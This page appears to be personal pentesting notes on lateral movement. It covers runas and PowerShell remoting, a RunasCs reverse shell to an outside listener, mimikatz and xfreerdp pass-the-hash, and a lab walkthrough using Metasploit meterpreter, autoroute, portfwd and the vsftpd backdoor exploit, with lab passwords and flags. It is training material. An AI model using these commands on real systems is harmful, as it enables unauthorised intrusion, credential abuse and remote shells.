Skip to content

Lateral movements

When you have access to AD credentials, we suggest using RDP as much as possible. If you use PowerShell Remoting and winrm to connect to a machine, you may no longer be able to run domain enumeration tools as you will experience the Kerberos Double Hop issue. To avoid it, the simplest way is to use RDP. Kerberos Double-Hop is discussed in detail in the PEN-300 course material.

Windows

Running as another user

Run as other user in your machine: runas

Run as another user. PIVOTING when you have access to a gui

1
runas /user:backupadmin cmd

Pivot to other machine: runas + Enter-PSSession

Step 1 in your machine:

1
runas /user:dev_user1 powershell.exe

Step 2 Then from that PowerShell session:

1
Enter-PSSession -ComputerName 172.16.5.139

Pivot to other machine: RunasCs.exe + Reverse shell

Logged as user1 with evil-winrm we cannot run psexec or any other tool requiring to confirm a modal, since we only have terminal access.

However, the tester can use the binary RunasCs.exe from: https://github.com/antonioCoco/RunasCs/releases. Forked in the tester repo: https://github.com/amandaguglieri/RunasCs

Upload the binary to the machine:

1
*Evil-WinRM* PS C:\Users\svc_winrm\Desktop> upload RunasCs.exe

Set a listener in a different terminal from the attacker's machine:

1
nc -lnvp 1234

Run a reverse shell:

1
.\RunasCS.exe svc_ldap M1XyC9pW7qT5Vn  powershell.exe -r 10.10.14.129:1234

Remote Desktop Protocol with mimikatz

If the host we want to lateral move to has "RestrictedAdmin" enabled, we can pass the hash using the RDP protocol and get an interactive session without the plaintext password.

1
2
3
4
5
#We execute pass-the-hash using mimikatz and spawn an instance of mstsc.exe with the "/restrictedadmin" flag
privilege::debug
sekurlsa::pth /user:<Username> /domain:<DomainName> /ntlm:<NTLMHash> /run:"mstsc.exe /restrictedadmin"

#Then just click ok on the RDP dialogue and enjoy an interactive session as the user we impersonated

Remote Desktop Protocol with xFreeRDP

1
xfreerdp3  +compression +clipboard +dynamic-resolution +toggle-fullscreen /cert-ignore /bpp:8  /u:<Username> /pth:<NTLMHash> /v:<Hostname | IPAddress>

TRoubleshooting: If Restricted Admin mode is disabled on the remote machine we can connect on the host using another tool/protocol like psexec or winrm and enable it by creating the following registry key and setting it's value zero: "HKLM:\System\CurrentControlSet\Control\Lsa\DisableRestrictedAdmin".

Linux

When you have access to AD credentials, we suggest using RDP as much as possible. If you use PowerShell Remoting and winrm to connect to a machine, you may no longer be able to run domain enumeration tools as you will experience the Kerberos Double Hop issue. To avoid it, the simplest way is to use RDP. Kerberos Double-Hop is discussed in detail in the PEN-300 course material.

1
2
xfreerdp /u:stephanie /d:corp.com /v:192.168.50.75
# pass: LegmanTeamBenzoin!!

Scenario 1

Lateral movement is a technique that adversaries use, after compromising an endpoint, to extend access to other hosts or applications in an organization.

lateral-movement.png

using metasploit

  1. Get our ip
1
2
ip a 
# 192.64.166.2
  1. Get machine ip 
1
2
ping demo.ine.local
# 192.64.166.3
  1. Enumerate services in the target machine 
1
2
nmap -sV -sS -O 192.64.166.3
# open ports: 80 and 3306.
  1. Go further on port 80
1
2
nmap 
# In the scan you will see: V-CMS-Powered by V-CMS  and PHPSESSID: httponly flag not set
  1. Launch metasploit and search for v-cms
1
2
service postgresql start
msfconsole -q

1
search v-cms
  1. Use the exploit exploit/linux/http/vcms_upload, configure it and run it
1
2
use exploit/linux/http/vcms_upload
show options

1
2
3
4
5
set RHOST 192.64.166.3
set TARGETURI /
set LHOST 192.64.166.2
set payload php/meterpreter/reverse_tcp
run
  1. You will get a limited meterpreter. Access to the shell and print the flag
1
2
3
meterpreter> shell
> cat /root/flag.txt
# 4f96a3e848d233d5af337c440e50fe3d
  1. Map other possible interfaces in the machine. Since ifconfig does not work, spawn the shell and try again
1
2
ifconfig 
# does not work

1
2
ipconfig
# does not work

1
2
which python
# it’s located under /bin, so we can use python to spawn the shell

1
python -c 'import pty; pty.spawn("/bin/bash")'

1
2
$root@machine> ifconfig
# it tells us about another interface: 192.182.147.2

route

  1. Add tunnel from interface 192.64.166.3 (which is session 1 of meterpreter) and the discovered interface, 192.182.147.2 with the utility route:
1
$root@machine> exit

1
2
meterpreter> run autoroute -s 192.182.147.0 -n 255.255.255.0
# you can also add a route out of the meterpreter. In that case you need to specify the meterpreter session: route add 192.182.147.0 .0 255.255.255.0 1
  1. Background the meterpreter session and check if the route is added successfully to the metasploit's routing table.
1
2
meterpreter> background
msf> route print
  1. Run auxiliary TCP port scanning module to discover any available hosts (From IP .3 to .10). And, if any of ports 80, 8080, 445, 21 and 22 are open on those hosts.
1
2
3
4
5
6
7
8
msf> use auxiliary/scanner/portscan/tcp

msf  auxiliary/scanner/portscan/tcp > set PORTS 80, 8080, 445, 21, 22

msf  auxiliary/scanner/portscan/tcp > set RHOSTS 192.69.228.3-10

msf  auxiliary/scanner/portscan/tcp > exploit
# Give us ports 21 and 22 open at 192.182.147.3

portfwd

  1. In order to reach the discovered target, we need to fordward remote machine port to the local machine port. We want to target port 21 of that machine so we will forward remote port 21 to the local port 1234. This is done with the utility portfwd from meterpreter
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
msf  auxiliary/scanner/portscan/tcp > sessions -i 1

meterpreter> portfwd
# Tell you  there is none configured

meterpreter> portfwd add -l 1234 -p 21 -r 192.182.147.3
# -l: local port 
# -p 21 The port we are targeting in our attack 
# -r the remote host

meterpreter> portfwd list
# It tells the active Port Forwards. Now, scan the local port using Nmap
  1. Run nmap on the forwarded local port to identify the service name
1
2
3
4
meterpreter> background

msf> nmap -sS -sV -p 1234 localhost
# It tells you the ftp version: vsftpd 2.0.8 or later
  1. Search for vsftpd exploit module and exploit the target host using vsftpd backdoor exploit module.
1
2
3
4
5
6
7
8
9
msf > search vsftpd 
msf> use exploit/unix/ftp/vsftpd_234_backdoor
msf exploit/unix/ftp/vsftpd_234_backdoor>   set RHOSTS 192.69.228.3
msf exploit/unix/ftp/vsftpd_234_backdoor> exploit

# Sometimes, the exploit fails the first time. If that happens then please run the exploit again.

$> id
# you are root.
  1. Print the flag
1
2
$> cat /root/flag.txt
# 58c7c29a8ab5e7c4c06256b954947f9a
Last update: 2026-03-07
Created: February 2, 2023 19:36:50